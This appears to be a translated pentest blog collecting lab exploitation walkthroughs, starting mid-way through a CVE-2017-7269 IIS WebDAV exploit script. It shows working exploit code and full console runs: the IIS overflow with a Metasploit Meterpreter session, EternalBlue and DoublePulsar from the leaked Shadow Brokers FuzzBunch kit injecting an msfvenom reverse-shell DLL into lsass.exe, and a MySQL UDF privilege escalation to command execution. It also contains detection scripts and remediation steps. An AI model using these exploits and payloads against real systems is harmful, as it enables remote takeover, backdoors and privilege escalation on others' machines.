pay += b'\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
shellcode = b'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'
pay += shellcode
pay += b'>\r\n\r\n'

print(pay)
sock.send(pay)
data = sock.recv(80960)
print(data)
sock.close()
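A request-level detection for the signature described above (a PROPFIND whose If: header is oversized and full of <http://...> tags), added here as an example and not taken from the PoC authors or from the references: it parses the request head and flags the combination of method, header and non-ASCII content. The 256-byte threshold and the two sample requests are constructed for illustration.

```python
IF_HEADER_LIMIT = 256   # constructed threshold; a legitimate If: header is a few tag/token pairs

def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request head into (method, {lower-cased header name: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    method = lines[0].split(b" ", 1)[0].decode("latin-1").upper()
    headers = {}
    for line in lines[1:]:
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().lower()] = value.strip()   # keep bytes: the payload is not text
    return method, headers

def looks_like_cve_2017_7269(raw: bytes) -> bool:
    """True for a PROPFIND whose If: header carries an oversized or non-ASCII <http://...> tag."""
    method, headers = parse_request(raw)
    if method != "PROPFIND":
        return False
    if_hdr = headers.get(b"if", b"")
    if b"<http://" not in if_hdr:
        return False
    non_ascii = any(b > 0x7F for b in if_hdr)   # the ROP chain is encoded as multi-byte UTF-8
    return len(if_hdr) > IF_HEADER_LIMIT or non_ascii

# Constructed samples: a normal WebDAV conditional request, and a request shaped like the PoC above.
BENIGN = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: srv\r\nDepth: 0\r\n"
          b"If: <http://srv/docs/> (<opaquelocktoken:abc>)\r\n\r\n")
MALICIOUS = (b"PROPFIND / HTTP/1.1\r\nHost: srv\r\nContent-Length: 0\r\n"
             b"If: <http://srv/aaaaaaa" + b"\xe6\xbd\xa8\xe7\xa1\xa3" * 100 +
             b"> (Not <locktoken:write1>)<http://srv/bbbbbbb" + b"\xe7\xa5\x88" * 100 +
             b">\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, looks_like_cve_2017_7269(req))
```

The non-ASCII test is what separates this from a plain length rule: the overflow lives in the UTF-8 to UTF-16 conversion, so the exploit cannot avoid multi-byte sequences, whereas a real WebDAV client percent-encodes non-ASCII path characters. A site that deliberately serves raw UTF-8 paths over WebDAV would trip the second condition and should rely on the length condition alone.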

Result

calc.exe was launched on the target.

MSF test

https://github.com/dmchell/metasploit-framework/blob/master/modules/exploits/windows/iis/cve-2017-7269.rb
Copy it to /usr/share/metasploit-framework/modules/exploits/windows/iis

msf > use exploit/windows/iis/cve-2017-7269
msf exploit(cve-2017-7269) > set rhost 172.16.100.162
rhost => 172.16.100.162
msf exploit(cve-2017-7269) > exploit

[*] Started reverse TCP handler on 172.16.100.177:4444 
[*] Sending stage (957487 bytes) to 172.16.100.162
[*] Meterpreter session 1 opened (172.16.100.177:4444 -> 172.16.100.162:1984) at 2017-04-24 11:56:48 +080

meterpreter > sysinfo 
Computer : VINCENT
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows

References

http://www.tuicool.com/articles/fMrEn2m
http://www.freebuf.com/vuls/130531.html

Testing the Shadow Brokers tools

Timeline

1. In August 2016 a group calling itself "Shadow Brokers" claimed to have broken into the Equation Group and stolen a large number of confidential files, some of which it published on the internet. The Equation Group is widely reported to be a hacking unit of the NSA with extremely advanced capabilities, and the published files included a number of covert hacking tools. Shadow Brokers kept the rest back, intending to auction it to the highest bidder at an asking price of 1 million bitcoin (then close to USD 500 million); the tools never sold.
2. On 8 April 2017 (Beijing time) Shadow Brokers published the password for the withheld archive; someone decrypted it and uploaded the contents to GitHub.
3. On the evening of 14 April 2017 (Beijing time) Shadow Brokers released a second batch of withheld files on Twitter, containing 23 new hacking tools.
The tools are named OddJob, EasyBee, EternalRomance, FuzzBunch, EducatedScholar, EskimoRoll, EclipsedWing, EsteemAudit, EnglishMansDentist, MofConfig, ErraticGopher, EmphasisMine, EmeraldThread, EternalSynergy, EwokFrenzy, ZippyBeer, ExplodingCan, DoublePulsar and so on.

Affected Windows versions

Windows NT, Windows 2000, Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 8, Windows 2008, Windows 2008 R2, Windows Server 2012 SP0

Tool downloads

1) Python 2.6 and pywin32 installers (both must be the 32-bit builds, otherwise loading the DLL payloads fails)
http://pan.baidu.com/s/1jHKw0AU password: kuij
2) The NSA tools released by Shadow Brokers
https://github.com/misterch0c/shadowbroker
windows: Windows exploits, implants and attack code
swift: material related to attacks on banks
oddjob: documentation for the ODDJOB backdoor
3) Infection check tool
https://github.com/countercept/doublepulsar-detection-script

Test environment

172.16.100.128 Kali
172.16.100.174 Windows 2003 SP2, attack box
172.16.100.176 Windows XP SP3, target (the Windows firewall must be off; it blocks port 445)

FuzzBunch framework test

FuzzBunch is somewhat like Metasploit, is cross-platform, and is driven through fb.py.
First create the directories listeningposts and log_dirs under C:\shadowbroker\windows,
then run fb.py from C:\shadowbroker\windows:

C:\shadowbroker\windows>python fb.py

--[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

  0) prompt confirm
  1) execute


Exploit Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Special Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Payload Autorun List
====================

  0) apply
  1) prompt confirm
  2) execute


[+] Set FbStorage => C:\shadowbroker\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] : 172.16.100.176
[?] Default Callback IP Address [] : 172.16.100.174
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : log_dirs
[*] Checking C:\shadowbroker\windows\log_dirs for projects
Index     Project
-----     -------
0         smb_log_dirs
1         Create a New Project

[?] Project [0] : 1
[?] New Project Name :
[?] Set target log directory to 'C:\shadowbroker\windows\log_dirs\z172.16.100.17
6'? [Yes] :

[*] Initializing Global State
[+] Set TargetIp => 172.16.100.176
[+] Set CallbackIp => 172.16.100.174

[!] Redirection OFF
[+] Set LogDir => C:\shadowbroker\windows\log_dirs\z172.16.100.176

Module: Global Variables
========================

Name                    Value
----                    -----
ResourcesDir            D:\DSZOPSDISK\Resources
Color                   True
ShowHiddenParameters    False
FbStorage               C:\shadowbroker\windows\storage
LogDir                  C:\shadowbroker\windows\log_dirs\z172.16.100.176
TargetIp                172.16.100.176
CallbackIp              172.16.100.174
TmpDir                  C:\shadowbroker\windows\log_dirs\z172.16.100.176
NetworkTimeout          60

Target IP is the victim; Callback IP is the attack box running fb.py.
The use command selects a plugin; these are available:

fb > use
Architouch           Esteemaudit          Printjoblist
Darkpulsar           Esteemaudittouch     Processlist
Domaintouch          Eternalblue          Regdelete
Doublepulsar         Eternalchampion      Regenum
Easybee              Eternalromance       Regread
Easypi               Eternalsynergy       Regwrite
Eclipsedwing         Ewokfrenzy           Rpcproxy
Eclipsedwingtouch    Explodingcan         Rpctouch
Educatedscholar      Explodingcantouch    Smbdelete
Educatedscholartouch Iistouch             Smblist
Emeraldthread        Jobadd               Smbread
Emeraldthreadtouch   Jobdelete            Smbtouch
Emphasismine         Joblist              Smbwrite
Englishmansdentist   Mofconfig            Webadmintouch
Erraticgopher        Namedpipetouch       Worldclienttouch
Erraticgophertouch   Pcdlllauncher        Zippybeer
Eskimoroll           Printjobdelete

The plugins fall into several classes:
target identification and vulnerability discovery: Architouch, Rpctouch, Domaintouch, Smbtouch, etc.;
exploits: EternalBlue, Emeraldthread, Eclipsedwing, EternalRomance, etc.;
post-exploitation: Doublepulsar, Regread, Regwrite, etc.
Smbtouch uses SMB to fingerprint the target's OS version, architecture and the exploits it is vulnerable to:

fb > use Smbtouch

[!] Entering Plugin Context :: Smbtouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.100.176
fb Touch (Smbtouch) > execute

[!] Preparing to Execute Smbtouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels

[+] Configure Plugin Remote Tunnels


Module: Smbtouch
================

Name                    Value
----                    -----
NetworkTimeout          60
TargetIp                172.16.100.176
TargetPort              445
RedirectedTargetIp
RedirectedTargetPort
UsingNbt                False
Pipe
Share
Protocol                SMB
Credentials             Anonymous

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] SMB Touch started

[*] TargetIp              172.16.100.176
[*] TargetPort            445
[*] RedirectedTargetIp    (null)
[*] RedirectedTargetPort  0
[*] NetworkTimeout        60
[*] Protocol              SMB
[*] Credentials           Anonymous

[*] Connecting to target...
        [+] Initiated SMB connection

[+] Target OS Version 5.1 build 2600
    Windows 5.1

[!] Target could be either SP2 or SP3,
[!] for these SMB exploits they are equivalent

[*] Trying pipes...
        [+] spoolss    - Success!

[+] Target is 32-bit

[Not Supported]
        ETERNALSYNERGY  - Target OS version not supported

[Vulnerable]
        ETERNALBLUE     - DANE
        ETERNALROMANCE  - FB
        ETERNALCHAMPION - DANE/FB

[*] Writing output parameters

[+] Target is vulnerable to 3 exploits
[+] Touch completed successfully

[+] Smbtouch Succeeded

The target appears vulnerable to three exploits (EternalBlue, EternalRomance and EternalChampion). Public write-ups all use EternalBlue, so let's try that:

fb Touch (Smbtouch) > use eternalblue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.100.176

[*] Applying Session Parameters
[-] Error: Invalid value for Target (XP_SP2SP3_X86)
[-] Skipping 'Target'
[*] Running Exploit Touches


[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
Target                WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 f
or no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [172.16.100.176] :

[*]  TargetPort :: Port used by the SMB service for exploit connection

[?] TargetPort [445] :

[*]  VerifyTarget :: Validate the SMB string from target against the target sele
cted before exploitation.

[?] VerifyTarget [True] :

[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor befor
e throwing. This option must be enabled for multiple exploit attempts.

[?] VerifyBackdoor [True] :

[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Dis
abled for XP/2K3.

[?] MaxExploitAttempts [3] :

[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup
allocations (XK/2K3) to do.

[?] GroomAllocations [12] :

[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] : 0
[+] Set Target => XP


[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure?
(y/n) [Yes] :
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.100.176] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.100.176:445

[+] Configure Plugin Remote Tunnels


Module: Eternalblue
===================

Name                  Value
----                  -----
DaveProxyPort         0
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                XP

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor not installed, game on.
[*] Forcing MaxExploitAttempts to 1.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (12 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 35 2e 31 00              Windows 5.1.
[*] Fingerprinting SMB non-paged pool quota
    [+] Allocation total: 0xfff4
    [+] Spray size: 0
    [+] Allocation total: 0x1ffe8
    [+] Spray size: 1
    [+] Allocation total: 0x2ffdc
    [+] Spray size: 2
    [+] Allocation total: 0x3ffd0
    [+] Spray size: 3
    [+] Allocation total: 0x4ffc4
    [+] Spray size: 4
    [+] Allocation total: 0x5ffb8
    [+] Spray size: 5
    [+] Allocation total: 0x6ffac
    [+] Spray size: 6
    [+] Allocation total: 0x7ffa0
    [+] Spray size: 7
    [+] Allocation total: 0x8ff94
    [+] Spray size: 8
    [+] Allocation total: 0x9ff88
    [+] Spray size: 9
    [+] Allocation total: 0xaff7c
    [+] Spray size: 10
    [+] Allocation total: 0xbff70
    [+] Spray size: 11
    [+] Quota NOT exceeded after 12 packets
    [+] Allocation total: 0xbff70
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
    ................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
    [+] Sending 2 non-paged pool fragment packets
        ....DONE.
    [+] Sent 2 non-paged pool fragment packets ofsize 0x00006FF9
    [+] Sending 10 non-paged pool grooming packets
        ..........DONE.
    [+] Sent 10 non-paged pool grooming packets - groom complete
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
    DONE.
[*] Receiving response from exploit packet
    [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x86 (32-bit)
    [+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 00                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

A successful run does not by itself give command execution: it installs a kernel-mode backdoor that the framework's other plugins then drive. DoublePulsar is the client for that backdoor and works like an injector, with these functions:
Ping: check whether the backdoor is installed
RunDLL: inject a DLL
RunShellcode: inject raw shellcode
Uninstall: remove the backdoor from the system
Here RunDLL is used to inject a DLL generated with msfvenom into the target.
Generate the DLL with msfvenom:

root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.100.128 LPORT=2345 -f dll > s.dll
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 299 bytes

Then start a handler in msf:

 # msfconsole
msf > use exploit/multi/handler
msf > set LHOST 172.16.100.128
msf > set LPORT 2345
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > exploit

fb Payload (Doublepulsar) > use DoublePulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.100.176

[*] Applying Session Parameters
[-] Error: Invalid value for Function ()
[-] Skipping 'Function'

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
DllPayload            C:\s.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x86
Function              RunDLL

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1
for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [172.16.100.176] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] :

[*]  Function :: Operation for backdoor to perform

    0) OutputInstall     Only output the install shellcode to a binary file on d
isk.
    1) Ping              Test for presence of backdoor
   *2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [2] : 2

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [C:\s.dll] : C:\s.dll

[*]  DllOrdinal :: The exported ordinal number of the DLL being injected to call


[?] DllOrdinal [1] :

[*]  ProcessName :: Name of process to inject into

[?] ProcessName [lsass.exe] :

[*]  ProcessCommandLine :: Command line of process to inject into

[?] ProcessCommandLine [] :


[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.100.176] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.100.176:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
DllPayload            C:\s.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x86
Function              RunDLL

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x0372FB2
5
    SMB Connection string is: Windows 5.1
    Target OS is: XP x86
        [+] Backdoor installed
        [+] DLL built
        [.] Sending shellcode to inject DLL
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Command completed successfully
[+] Doublepulsar Succeeded

The callback arrives and we get a meterpreter session:

meterpreter > sysinfo
Computer        : VINCENT-3B49409
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > shell
Process 344 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

MSF

https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb
Copy it to /usr/share/metasploit-framework/modules/auxiliary/scanner/smb

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 172.16.100.176
rhosts => 172.16.100.176
msf auxiliary(smb_ms17_010) > exploit 
[*] 172.16.100.176:445 - Connected to \\172.16.100.176\IPC$ with TID = 2048
[*] 172.16.100.176:445 - Received STATUS_INSUFF_SERVER_RESOURCES with FID = 0
[!] 172.16.100.176:445 - Host is likely VULNERABLE to MS17-010!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Nmap

smb-vuln-ms17-010 detection script:
https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/smb-vuln-ms17-010.nse

root@kali:/usr/share/nmap/scripts# nmap -p 445 --script=smb-vuln-ms17-010 192.168.190.46

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-27 11:41 CST
Nmap scan report for 192.168.190.46
Host is up (0.00054s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
| 
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

Infection check

Requires a Python environment with the argparse package installed

C:\doublepulsar-detection-script-master>python detect_doublepulsar.py --ip 172.16.100.176
[+] [172.16.100.176] DOUBLEPULSAR DETECTED!!!
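What the detection script above is keying on, as an added example that re-implements its decision logic rather than copying its code: the implant hooks the SMB Trans2 SESSION_SETUP handler, so a probe sent with Multiplex ID 0x41 comes back with 0x41 plus the implant's status code (0x10 for success, the "returned code: 10" visible in the FuzzBunch output above; 0x20 and 0x30 for invalid parameters and allocation failure), i.e. 0x51 on an infected host, while a clean server simply echoes 0x41. The code parses a captured reply and forges sample replies so it runs offline; sending the probe itself needs a live SMB connection and is left to the script.

```python
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
CLEAN_MID = 0x41            # Multiplex ID a normal server echoes back to the probe
STATUS_NAMES = {0x10: "success", 0x20: "invalid parameters", 0x30: "allocation failure"}

def parse_smb_header(pkt: bytes) -> dict:
    """Parse a NetBIOS-framed SMB1 message: 4-byte NBSS header + 32-byte SMB header."""
    if len(pkt) < 36 or pkt[4:8] != SMB_MAGIC:
        raise ValueError("not an SMB1 message")
    (cmd, status, flags, flags2, pid_high, _sig, _rsvd,
     tid, pid_low, uid, mid) = struct.unpack("<BIBHH8sHHHHH", pkt[8:36])
    return {"command": cmd, "status": status, "flags": flags, "flags2": flags2,
            "tid": tid, "pid": (pid_high << 16) | pid_low, "uid": uid, "mid": mid}

def doublepulsar_status(reply: bytes):
    """Return the implant's status code (0x10/0x20/0x30) if the Trans2 reply carries the
    DoublePulsar signature; None for a clean host or an unrelated packet."""
    hdr = parse_smb_header(reply)
    if hdr["command"] != SMB_COM_TRANSACTION2:
        return None
    code = hdr["mid"] - CLEAN_MID          # the implant adds its status to the echoed MID
    return code if code in STATUS_NAMES else None

def build_reply(mid: int, command: int = SMB_COM_TRANSACTION2) -> bytes:
    """Constructed helper: forge a minimal Trans2 response with the given Multiplex ID."""
    smb = SMB_MAGIC + struct.pack("<BIBHH8sHHHHH", command, 0, 0x98, 0xC807, 0,
                                  b"\0" * 8, 0, 0, 0xFEFF, 0x0800, mid)
    return struct.pack(">I", len(smb)) + smb      # NBSS: message type 0 + 3-byte length

if __name__ == "__main__":
    for sample in (build_reply(CLEAN_MID), build_reply(0x51)):
        code = doublepulsar_status(sample)
        print("DOUBLEPULSAR DETECTED, status %s" % STATUS_NAMES[code] if code else "clean")
```

The MID sits at byte 34 of the framed message (offset 30 of the SMB header plus the 4-byte NetBIOS prefix), which is the single byte the public script compares against 0x51. Checking the command field as well avoids a false positive from an unrelated SMB reply that happens to carry that MID.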

Remediation

1) Upgrade to a Windows version Microsoft still supports, install the latest patches and turn on automatic updates. (Microsoft also released out-of-band MS17-010 patches for Windows XP and Server 2003 on 13 May 2017; apply them where those systems cannot be retired.)
2) On versions without a patch such as Windows 2003 and Windows XP, block ports 135, 137, 139 and 445; for RDP on 3389, if it cannot be turned off, at least disable smart-card logon (the EsteemAudit exploit targets it).
3) Install anti-virus software.

References

http://bobao.360.cn/news/detail/4118.html
http://bobao.360.cn/learning/detail/3743.html
http://www.freebuf.com/sectool/132076.html
http://bobao.360.cn/news/detail/4119.html

MySQL UDF privilege escalation (Linux)

A UDF (user-defined function) is a shared library that MySQL loads into mysqld. With a library that defines functions such as sys_exec and sys_eval, an intruder who has database access can run system commands as the mysqld user, shell access they would not normally have.
Some write-ups use the lib_mysqludf_sys.so_ file from sqlmap-master\udf\mysql\linux\64, but loading it as-is fails, because sqlmap ships those files "cloaked" (hence the trailing underscore) and they have to be decoded with sqlmap's extra/cloak/cloak.py -d first:

mysql> create function sys_eval returns string soname 'udf.so';
ERROR 1126 (HY000): Can't open shared library 'udf.so' (errno: 22 /usr/lib64/mysql/plugin/udf.so: invalid ELF header)

Alternatively, build it from source. Download lib_mysqludf_sys from https://github.com/mysqludf/lib_mysqludf_sys, unpack it and compile in the source directory:

gcc -DMYSQL_DYNAMIC_PLUGIN -fPIC -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so

Note: the build may fail with

In file included from lib_mysqludf_sys.c:40:
/usr/include/mysql/my_global.h:626:25: error: my_compiler.h: No such file or directory

This is caused by a MySQL header bug; comment out line 626 of /usr/include/mysql/my_global.h and rebuild.
Once lib_mysqludf_sys.so is built, convert it to a hex string with Hex.hta (or, on Linux, xxd -p lib_mysqludf_sys.so | tr -d '\n'), then:

mysql> show variables like '%plugin%';
+---------------+-------------------------+
| Variable_name | Value                   |
+---------------+-------------------------+
| plugin_dir    | /usr/lib64/mysql/plugin |
+---------------+-------------------------+
1 row in set (0.00 sec)

mysql> select * from func; # check whether someone has already exported a UDF
mysql> select unhex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into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.01 sec) # requires write permission on /usr/lib64/mysql/plugin/

mysql> create function sys_eval returns string soname 'mysqludf.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql
             |
+--------------------+
1 row in set (0.03 sec)

mysql> select * from func;
